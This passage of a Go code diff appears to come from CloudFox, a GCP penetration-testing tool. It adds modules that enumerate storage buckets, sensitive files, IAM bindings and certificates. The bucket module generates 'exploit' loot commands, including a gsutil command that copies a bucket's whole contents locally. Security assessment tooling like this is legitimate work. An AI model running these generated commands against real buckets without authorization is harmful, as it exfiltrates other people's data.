var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BucketEnumOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_STORAGEENUM_MODULE_NAME) + } +} + +func (m *BucketEnumModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + if m.EnumerateAll { + // Full enumeration mode + allObjects := m.getAllObjects() + if len(allObjects) > 0 { + tables = append(tables, internal.TableFile{ + Name: "storage-enum-all", + Header: m.getAllObjectsHeader(), + Body: m.allObjectsToTableBody(allObjects), + }) + + // Count public objects + publicCount := 0 + for _, obj := range allObjects { + if obj.IsPublic { + publicCount++ + } + } + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible object(s)!", publicCount), globals.GCP_STORAGEENUM_MODULE_NAME) + } + } + } else { + // Sensitive files mode + allFiles := m.getAllSensitiveFiles() + if len(allFiles) > 0 { + tables = append(tables, internal.TableFile{ + Name: "storage-enum", + Header: m.getFilesHeader(), + Body: m.filesToTableBody(allFiles), + }) + + sensitiveBody := m.sensitiveFilesToTableBody(allFiles) + if len(sensitiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "storage-enum-sensitive", + Header: m.getSensitiveFilesHeader(), + Body: sensitiveBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d CRITICAL/HIGH risk files!", len(sensitiveBody)), globals.GCP_STORAGEENUM_MODULE_NAME) + } + } + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := BucketEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_STORAGEENUM_MODULE_NAME) + } +} + +// getObjectDir returns the directory portion of an object path +// e.g., "processReports-pilot-gcp-01/function-source.zip" -> "processReports-pilot-gcp-01/" +// e.g., "file.txt" -> "" +func getObjectDir(objectName string) string { + lastSlash := strings.LastIndex(objectName, "/") + if lastSlash == -1 { + return "" + } + return objectName[:lastSlash+1] +} + +func formatFileSize(bytes int64) string { + const ( + KB = 1024 + MB = KB * 1024 + GB = MB * 1024 + ) + + switch { + case bytes >= GB: + return fmt.Sprintf("%.1f GB", float64(bytes)/GB) + case bytes >= MB: + return fmt.Sprintf("%.1f MB", float64(bytes)/MB) + case bytes >= KB: + return fmt.Sprintf("%.1f KB", float64(bytes)/KB) + default: + return fmt.Sprintf("%d B", bytes) + } +} diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index a0a5944c..d0b0df9f 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -1,115 +1,482 @@ package commands import ( + "context" "fmt" + "strings" + "sync" CloudStorageService "github.com/BishopFox/cloudfox/gcp/services/cloudStorageService" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) -var GCPBucketsCommand = &cobra.Command{ - Use: globals.GCP_BUCKETS_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP buckets information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available bucket information: -cloudfox gcp buckets`, - Run: runGCPBucketsCommand, +var GCPStorageCommand = &cobra.Command{ + Use: globals.GCP_STORAGE_MODULE_NAME, + Aliases: []string{"buckets", "gcs"}, + Short: "Enumerate GCP Cloud Storage buckets with security configuration", + Long: `Enumerate GCP Cloud Storage buckets across projects with security-relevant details. + +Features: +- Lists all buckets accessible to the authenticated user +- Shows security configuration (public access prevention, uniform access, versioning) +- Enumerates IAM policies and identifies public buckets +- Shows encryption type (Google-managed vs CMEK) +- Shows retention, soft delete, and lifecycle policies +- Generates gcloud commands for further enumeration +- Generates exploitation commands for data access + +Security Columns: +- Public: Whether the bucket has allUsers or allAuthenticatedUsers access +- Public Access Prevention: + "enforced" = Public access blocked at bucket level + "inherited" = Inherits from project/org (may allow public if not blocked above) + "unspecified" = No prevention (most permissive) +- Uniform Access: + "Yes" = IAM-only access control (recommended, no ACLs) + "No (ACLs)" = Legacy ACLs enabled - access can be granted at object level + bypassing bucket IAM, harder to audit +- Soft Delete: Retention period for deleted objects (ransomware protection) + "No" = Deleted objects are immediately removed + "Xd" = Deleted objects retained for X days before permanent deletion +- Lifecycle: Automated object management rules + "Delete@Xd" = Objects auto-deleted after X days (data loss risk if short) + "Archive" = Objects transitioned to cheaper storage classes + "X rules" = Number of lifecycle rules configured +- Versioning: Object versioning (helps recovery, compliance) +- Encryption: "Google-managed" or "CMEK" (customer-managed keys)`, + Run: runGCPStorageCommand, } -// Code needed to output fields from buckets results using generic HandleOutput function +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type BucketsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectBuckets map[string][]CloudStorageService.BucketInfo // projectID -> buckets + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) + mu sync.Mutex +} -// Results struct that implements the internal.OutputInterface -type GCPBucketsResults struct { - Data []CloudStorageService.BucketInfo +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type BucketsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile } -// Decide what format the name, header and body of the CSV & JSON files will be -func (g GCPBucketsResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +func (o BucketsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BucketsOutput) LootFiles() []internal.LootFile { return o.Loot } - header := []string{ - "Name", - "Location", - "ProjectID", +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPStorageCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_STORAGE_MODULE_NAME) + if err != nil { + return // Error already logged } - var body [][]string + // Create module instance + module := &BucketsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectBuckets: make(map[string][]CloudStorageService.BucketInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } - for _, value := range g.Data { - body = append( - body, - []string{ - value.Name, - value.Location, - value.ProjectID, - }, - ) + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *BucketsModule) Execute(ctx context.Context, logger internal.Logger) { + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_STORAGE_MODULE_NAME) } - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_BUCKETS_MODULE_NAME, + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_STORAGE_MODULE_NAME, m.processProject) + + // Get all buckets for stats + allBuckets := m.getAllBuckets() + if len(allBuckets) == 0 { + logger.InfoM("No buckets found", globals.GCP_STORAGE_MODULE_NAME) + return + } + + // Count public buckets for summary + publicCount := 0 + for _, bucket := range allBuckets { + if bucket.IsPublic { + publicCount++ + } } - tableFiles = append(tableFiles, tableFile) - return tableFiles + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d bucket(s), %d PUBLIC", len(allBuckets), publicCount), globals.GCP_STORAGE_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d bucket(s)", len(allBuckets)), globals.GCP_STORAGE_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) } -// Decide what is loot based on resource information -func (g GCPBucketsResults) LootFiles() []internal.LootFile { - return []internal.LootFile{} +// getAllBuckets returns all buckets from all projects (for statistics) +func (m *BucketsModule) getAllBuckets() []CloudStorageService.BucketInfo { + var all []CloudStorageService.BucketInfo + for _, buckets := range m.ProjectBuckets { + all = append(all, buckets...) + } + return all } -// Houses high-level logic that retrieves resources and writes to output -func runGCPBucketsCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs from parent (gcp command) ctx - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_BUCKETS_MODULE_NAME) +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *BucketsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating buckets in project: %s", projectID), globals.GCP_STORAGE_MODULE_NAME) + } + + // Create service and fetch buckets + cs := CloudStorageService.New() + buckets, err := cs.Buckets(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_STORAGE_MODULE_NAME, + fmt.Sprintf("Could not enumerate buckets in project %s", projectID)) + return + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectBuckets[projectID] = buckets + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["buckets-commands"] = &internal.LootFile{ + Name: "buckets-commands", + Contents: "# GCP Cloud Storage Bucket Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + // Generate loot for each bucket + for _, bucket := range buckets { + m.addBucketToLoot(projectID, bucket) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project %s", len(buckets), projectID), globals.GCP_STORAGE_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *BucketsModule) addBucketToLoot(projectID string, bucket CloudStorageService.BucketInfo) { + lootFile := m.LootMap[projectID]["buckets-commands"] + if lootFile == nil { + return } - if value, ok := ctx.Value("account").(string); ok { - account = value + // All commands for this bucket + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# BUCKET: gs://%s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe bucket:\n"+ + "gcloud storage buckets describe gs://%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud storage buckets get-iam-policy gs://%s --project=%s\n"+ + "# List objects:\n"+ + "gsutil ls gs://%s/\n"+ + "gsutil ls -L gs://%s/\n"+ + "# List all objects recursively:\n"+ + "gsutil ls -r gs://%s/**\n"+ + "# Get bucket size:\n"+ + "gsutil du -s gs://%s/\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Download all contents (create directory first):\n"+ + "mkdir -p bucket/%s/\n"+ + "gsutil -m cp -r gs://%s/ bucket/%s/\n"+ + "# Check for public access:\n"+ + "curl -s https://storage.googleapis.com/%s/ | head -20\n\n", + bucket.Name, bucket.ProjectID, bucket.Location, + bucket.Name, bucket.ProjectID, + bucket.Name, bucket.ProjectID, + bucket.Name, + bucket.Name, + bucket.Name, + bucket.Name, + bucket.Name, + bucket.Name, bucket.Name, + bucket.Name, + ) +} + +// Helper functions are now provided by the shared package: +// - shared.BoolToYesNo() for boolean formatting +// - shared.GetPrincipalType() for IAM member type extraction + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Log findings first + allBuckets := m.getAllBuckets() + publicCount := 0 + for _, bucket := range allBuckets { + if bucket.IsPublic { + publicCount++ + } + } + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible bucket(s)!", publicCount), globals.GCP_STORAGE_MODULE_NAME) + } + + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_BUCKETS_MODULE_NAME) + m.writeFlatOutput(ctx, logger) } +} - // Get the bucket info using the projectIDs and CloudStorageService - cs := CloudStorageService.New() - var results []CloudStorageService.BucketInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all buckets from project: %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) - result, err := cs.Buckets(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BUCKETS_MODULE_NAME) - return +// writeHierarchicalOutput writes output to per-project directories +func (m *BucketsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, buckets := range m.ProjectBuckets { + body := m.bucketsToTableBody(buckets) + tables := []internal.TableFile{{ + Name: globals.GCP_STORAGE_MODULE_NAME, + Header: header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BucketsOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_STORAGE_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *BucketsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + allBuckets := m.getAllBuckets() + body := m.bucketsToTableBody(allBuckets) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } - results = append(results, result...) - logger.InfoM(fmt.Sprintf("Done retrieving all buckets from project: %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) - cloudfoxOutput := GCPBucketsResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_BUCKETS_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BUCKETS_MODULE_NAME) - return + } + + tableFiles := []internal.TableFile{{ + Name: globals.GCP_STORAGE_MODULE_NAME, + Header: header, + Body: body, + }} + + output := BucketsOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Build scope names from project names map + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames (display names) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_STORAGE_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// getTableHeader returns the buckets table header +func (m *BucketsModule) getTableHeader() []string { + return []string{ + "Project", + "Name", + "Location", + "Public", + "Public Access Prevention", + "Uniform Access", + "Soft Delete", + "Lifecycle", + "Versioning", + "Encryption", + "IAM Binding Role", + "Principal Type", + "IAM Binding Principal", + "Principal Attack Paths", + } +} + +// bucketsToTableBody converts buckets to table body rows +func (m *BucketsModule) bucketsToTableBody(buckets []CloudStorageService.BucketInfo) [][]string { + var body [][]string + for _, bucket := range buckets { + // Format public access + publicDisplay := "No" + if bucket.IsPublic { + publicDisplay = bucket.PublicAccess + } + + // Format soft delete + softDeleteDisplay := "No" + if bucket.SoftDeleteEnabled { + softDeleteDisplay = fmt.Sprintf("%dd", bucket.SoftDeleteRetentionDays) + } + + // Format lifecycle - show delete rule age if present + lifecycleDisplay := "No" + if bucket.LifecycleEnabled { + if bucket.HasDeleteRule && bucket.ShortestDeleteDays > 0 { + lifecycleDisplay = fmt.Sprintf("Delete@%dd", bucket.ShortestDeleteDays) + } else if bucket.HasArchiveRule { + lifecycleDisplay = "Archive" + } else { + lifecycleDisplay = fmt.Sprintf("%d rules", bucket.LifecycleRuleCount) + } + } + + // Format uniform access - highlight security concern if disabled + uniformAccessDisplay := "Yes" + if !bucket.UniformBucketLevelAccess { + uniformAccessDisplay = "No (ACLs)" + } + + // Format encryption - show KMS key if CMEK + encryptionDisplay := bucket.EncryptionType + if bucket.EncryptionType == "CMEK" && bucket.KMSKeyName != "" { + // Extract just the key name from the full path for display + // Format: projects/PROJECT/locations/LOCATION/keyRings/RING/cryptoKeys/KEY + keyParts := strings.Split(bucket.KMSKeyName, "/") + if len(keyParts) >= 2 { + encryptionDisplay = fmt.Sprintf("CMEK (%s)", keyParts[len(keyParts)-1]) + } + } + + // One row per IAM member + if len(bucket.IAMBindings) > 0 { + for _, binding := range bucket.IAMBindings { + for _, member := range binding.Members { + memberType := shared.GetPrincipalType(member) + + // Check attack paths for service account principals + attackPaths := "-" + if memberType == "ServiceAccount" { + // Extract email from member string (serviceAccount:email@...) + email := strings.TrimPrefix(member, "serviceAccount:") + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, email) + } + + body = append(body, []string{ + m.GetProjectName(bucket.ProjectID), + bucket.Name, + bucket.Location, + publicDisplay, + bucket.PublicAccessPrevention, + uniformAccessDisplay, + softDeleteDisplay, + lifecycleDisplay, + shared.BoolToYesNo(bucket.VersioningEnabled), + encryptionDisplay, + binding.Role, + memberType, + member, + attackPaths, + }) + } + } + } else { + // Bucket with no IAM bindings + body = append(body, []string{ + m.GetProjectName(bucket.ProjectID), + bucket.Name, + bucket.Location, + publicDisplay, + bucket.PublicAccessPrevention, + uniformAccessDisplay, + softDeleteDisplay, + lifecycleDisplay, + shared.BoolToYesNo(bucket.VersioningEnabled), + encryptionDisplay, + "-", + "-", + "-", + "-", + }) } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) } + return body } diff --git a/gcp/commands/certmanager.go b/gcp/commands/certmanager.go new file mode 100644 index 00000000..0e279059 --- /dev/null +++ b/gcp/commands/certmanager.go @@ -0,0 +1,382 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + certmanagerservice "github.com/BishopFox/cloudfox/gcp/services/certManagerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCertManagerCommand = &cobra.Command{ + Use: globals.GCP_CERTMANAGER_MODULE_NAME, + Aliases: []string{"certs", "certificates", "ssl"}, + Short: "Enumerate SSL/TLS certificates and find expiring or misconfigured certs", + Long: `Enumerate SSL/TLS certificates from Certificate Manager and Compute Engine. + +This module finds all certificates and identifies security issues: +- Expired or soon-to-expire certificates +- Failed certificate issuance +- Wildcard certificates (higher impact if compromised) +- Self-managed certificates that need manual renewal + +Security Relevance: +- Expired certificates cause outages and security warnings +- Wildcard certificates can be abused to MITM any subdomain +- Certificate domains reveal infrastructure and services +- Self-managed certs may have exposed private keys + +What this module finds: +- Certificate Manager certificates (global) +- Compute Engine SSL certificates (classic) +- Certificate maps +- Expiration status +- Associated domains`, + Run: runGCPCertManagerCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CertManagerModule struct { + gcpinternal.BaseGCPModule + + ProjectCertificates map[string][]certmanagerservice.Certificate // projectID -> certificates + ProjectSSLCertificates map[string][]certmanagerservice.SSLCertificate // projectID -> SSL certs + ProjectCertMaps map[string][]certmanagerservice.CertificateMap // projectID -> cert maps + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CertManagerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CertManagerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CertManagerOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCertManagerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CERTMANAGER_MODULE_NAME) + if err != nil { + return + } + + module := &CertManagerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectCertificates: make(map[string][]certmanagerservice.Certificate), + ProjectSSLCertificates: make(map[string][]certmanagerservice.SSLCertificate), + ProjectCertMaps: make(map[string][]certmanagerservice.CertificateMap), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CertManagerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CERTMANAGER_MODULE_NAME, m.processProject) + + allCerts := m.getAllCertificates() + allSSLCerts := m.getAllSSLCertificates() + allCertMaps := m.getAllCertMaps() + + totalCerts := len(allCerts) + len(allSSLCerts) + + if totalCerts == 0 { + logger.InfoM("No certificates found", globals.GCP_CERTMANAGER_MODULE_NAME) + return + } + + // Count expiring/expired certs + expiringCount := 0 + expiredCount := 0 + + for _, cert := range allCerts { + if cert.DaysUntilExpiry < 0 { + expiredCount++ + } else if cert.DaysUntilExpiry <= 30 { + expiringCount++ + } + } + for _, cert := range allSSLCerts { + if cert.DaysUntilExpiry < 0 { + expiredCount++ + } else if cert.DaysUntilExpiry <= 30 { + expiringCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d certificate(s), %d map(s)", + totalCerts, len(allCertMaps)), globals.GCP_CERTMANAGER_MODULE_NAME) + + if expiredCount > 0 { + logger.InfoM(fmt.Sprintf("[HIGH] %d certificate(s) have EXPIRED!", expiredCount), globals.GCP_CERTMANAGER_MODULE_NAME) + } + if expiringCount > 0 { + logger.InfoM(fmt.Sprintf("[MEDIUM] %d certificate(s) expire within 30 days", expiringCount), globals.GCP_CERTMANAGER_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *CertManagerModule) getAllCertificates() []certmanagerservice.Certificate { + var all []certmanagerservice.Certificate + for _, certs := range m.ProjectCertificates { + all = append(all, certs...) + } + return all +} + +func (m *CertManagerModule) getAllSSLCertificates() []certmanagerservice.SSLCertificate { + var all []certmanagerservice.SSLCertificate + for _, certs := range m.ProjectSSLCertificates { + all = append(all, certs...) + } + return all +} + +func (m *CertManagerModule) getAllCertMaps() []certmanagerservice.CertificateMap { + var all []certmanagerservice.CertificateMap + for _, maps := range m.ProjectCertMaps { + all = append(all, maps...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CertManagerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking certificates in project: %s", projectID), globals.GCP_CERTMANAGER_MODULE_NAME) + } + + svc := certmanagerservice.New() + + // Get Certificate Manager certs + certs, err := svc.GetCertificates(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate certificates in project %s", projectID)) + } + + // Get classic SSL certs + sslCerts, err := svc.GetSSLCertificates(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate SSL certificates in project %s", projectID)) + } + + // Get certificate maps + certMaps, err := svc.GetCertificateMaps(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate certificate maps in project %s", projectID)) + } + + m.mu.Lock() + m.ProjectCertificates[projectID] = certs + m.ProjectSSLCertificates[projectID] = sslCerts + m.ProjectCertMaps[projectID] = certMaps + m.mu.Unlock() +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *CertManagerModule) getCertificatesHeader() []string { + return []string{"Project", "Name", "Type", "Domains", "Expires", "Days Left", "Wildcard", "Expired", "Self-Managed"} +} + +func (m *CertManagerModule) getCertMapsHeader() []string { + return []string{"Project", "Name", "Location", "Entries", "Certificates"} +} + +func (m *CertManagerModule) certsToTableBody(certs []certmanagerservice.Certificate, sslCerts []certmanagerservice.SSLCertificate) [][]string { + var body [][]string + + for _, cert := range certs { + wildcard := "No" + if cert.Wildcard { + wildcard = "Yes" + } + expired := "No" + if cert.Expired { + expired = "Yes" + } + selfManaged := "No" + if cert.SelfManaged { + selfManaged = "Yes" + } + + body = append(body, []string{ + m.GetProjectName(cert.ProjectID), + cert.Name, + cert.Type, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, + fmt.Sprintf("%d", cert.DaysUntilExpiry), + wildcard, + expired, + selfManaged, + }) + } + + for _, cert := range sslCerts { + wildcard := "No" + if cert.Wildcard { + wildcard = "Yes" + } + expired := "No" + if cert.Expired { + expired = "Yes" + } + selfManaged := "No" + if cert.SelfManaged { + selfManaged = "Yes" + } + + body = append(body, []string{ + m.GetProjectName(cert.ProjectID), + cert.Name, + cert.Type, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, + fmt.Sprintf("%d", cert.DaysUntilExpiry), + wildcard, + expired, + selfManaged, + }) + } + + return body +} + +func (m *CertManagerModule) certMapsToTableBody(certMaps []certmanagerservice.CertificateMap) [][]string { + var body [][]string + for _, certMap := range certMaps { + body = append(body, []string{ + m.GetProjectName(certMap.ProjectID), + certMap.Name, + certMap.Location, + fmt.Sprintf("%d", certMap.EntryCount), + strings.Join(certMap.Certificates, ", "), + }) + } + return body +} + +func (m *CertManagerModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + certs := m.ProjectCertificates[projectID] + sslCerts := m.ProjectSSLCertificates[projectID] + if len(certs) > 0 || len(sslCerts) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "certificates", + Header: m.getCertificatesHeader(), + Body: m.certsToTableBody(certs, sslCerts), + }) + } + + if certMaps, ok := m.ProjectCertMaps[projectID]; ok && len(certMaps) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "certificate-maps", + Header: m.getCertMapsHeader(), + Body: m.certMapsToTableBody(certMaps), + }) + } + + return tableFiles +} + +func (m *CertManagerModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectCertificates { + projectIDs[projectID] = true + } + for projectID := range m.ProjectSSLCertificates { + projectIDs[projectID] = true + } + for projectID := range m.ProjectCertMaps { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + outputData.ProjectLevelData[projectID] = CertManagerOutput{Table: tableFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CERTMANAGER_MODULE_NAME) + } +} + +func (m *CertManagerModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allCerts := m.getAllCertificates() + allSSLCerts := m.getAllSSLCertificates() + allCertMaps := m.getAllCertMaps() + + var tables []internal.TableFile + + if len(allCerts) > 0 || len(allSSLCerts) > 0 { + tables = append(tables, internal.TableFile{ + Name: "certificates", + Header: 